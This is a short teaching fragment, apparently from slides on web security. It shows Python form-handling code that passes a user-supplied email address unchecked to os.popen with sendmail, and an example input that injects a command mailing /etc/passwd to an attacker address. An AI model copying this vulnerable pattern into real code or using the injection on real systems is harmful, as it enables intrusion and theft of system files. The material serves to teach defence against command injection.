 | Suppose you ask for the user's email in a Web form |
| Suppose the form is processed by this code:
if form.has_key("mailaddress"):
mailaddress = form.getvalue("mailaddress")
note = "Thank you!"
# send a mail:
mail = os.popen("/usr/lib/sendmail " + mailaddress, 'w')
mail.write("...")
mail.close()
|
| What happens if somebody gives this "address":
x; mail evilhacker@some.where < /etc/passwd?? |
